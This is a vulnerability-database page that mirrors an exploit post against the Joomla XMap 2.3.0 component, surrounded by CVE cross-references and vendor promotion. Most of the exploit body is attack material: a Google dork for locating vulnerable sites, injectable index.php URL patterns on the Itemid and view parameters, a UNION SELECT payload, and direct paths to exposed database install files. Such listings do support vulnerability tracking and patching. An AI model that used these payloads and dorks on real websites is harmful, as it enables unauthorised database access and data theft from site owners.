Lucene search
K

Joomla XMap 2.3.0 Database Disclosure / SQL Injection

🗓️ 31 Jan 2019 00:00:00Reported by KingSkrupellosType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 54 Views

Joomla XMap 2.3.0 SQL Injection / Database Disclosure by KingSkrupello

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2010-2678
8 Jul 201022:00
cve
Cvelist
CVE-2010-2678
8 Jul 201022:00
cvelist
EUVD
EUVD-2010-2682
7 Oct 202500:30
euvd
NVD
CVE-2010-2678
8 Jul 201022:30
nvd
Prion
Sql injection
8 Jul 201022:30
prion
`####################################################################  
  
# Exploit Title : Joomla XMap Components 2.3.0 SQL Injection / Database Disclosure  
# Author [ Discovered By ] : KingSkrupellos  
# Team : Cyberizm Digital Security Army  
# Date : 30/01/2019  
# Vendor Homepage : joomla.org  
# Software Download Links : joomla4ever.org/archive/ext/com_xmap.zip  
joomlacode.org/gf/project/xmap/frs/?action=FrsReleaseBrowse&frs_package_id=3882  
rsjoomla.com/support/documentation/rsblog-/plugins-and-modules/xmap-plugin.html  
# Software Information Link : joomla4ever.org/extensions/ext-xmap  
# Software Versions : 1.2.7 / 2.3.0 and other versions  
# Tested On : Windows and Linux  
# Category : WebApps  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/index.php?option=com_xmap''  
# Vulnerability Type : CWE-89 [ Improper Neutralization of   
Special Elements used in an SQL Command ('SQL Injection') ]  
CWE-200 [ Information Exposure ]  
# Similar but for old Version CVE : cvedetails.com/cve/CVE-2010-2678/ - CVE-2010-2678  
Note : Keep in mind. This Exploit/Vuln has been told in more details.  
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968  
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/  
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos  
# Reference Link : cxsecurity.com/issue/WLB-2019010285  
  
####################################################################  
  
# Description about Software :  
***************************  
  
"XMAP" is open source software for Joomla.  
  
####################################################################  
  
# Impact :  
***********  
* SQL injection vulnerability in xmap (com_xmap) component for Joomla!   
  
allows remote attackers to execute arbitrary SQL commands via the Itemid parameter to index.php.   
  
* Successful exploitation will let attackers to manipulate SQL queries by injecting arbitrary SQL code.  
  
* The flaw is due to input passed via 'view=' and 'Itemid=' parameter to 'index.php'   
  
is not properly sanitised before being used in a SQL query.  
  
####################################################################  
  
# SQL Injection Exploit :  
**********************  
  
/index.php?option=com_xmap&Itemid=[SQL Injection]  
  
/index.php?option=com_xmap&sitemap=[ID-NUMBER]&Itemid=[SQL Injection]  
  
/index.php?option=com_xmap&tmpl=component&Itemid=[ID-NUMBER]&view=[SQL Injection]  
  
/index.php?option=com_xmap&view=html&id=[ID-NUMBER]&Itemid=[SQL Injection]  
  
# Exploit Payload :  
*****************  
  
-1 UNION SELECT 1,2,3,version(),5,6,7,8--  
  
####################################################################  
  
# Database Disclosure Exploit :  
****************************  
  
/administrator/components/com_xmap/install/install.postgresql.sql  
  
/administrator/components/com_xmap/install/install.utf8.sql  
  
/administrator/components/com_xmap/install/uninstall.postgresql.sql  
  
/administrator/components/com_xmap/install/uninstall.utf8.sql  
  
####################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team   
  
####################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation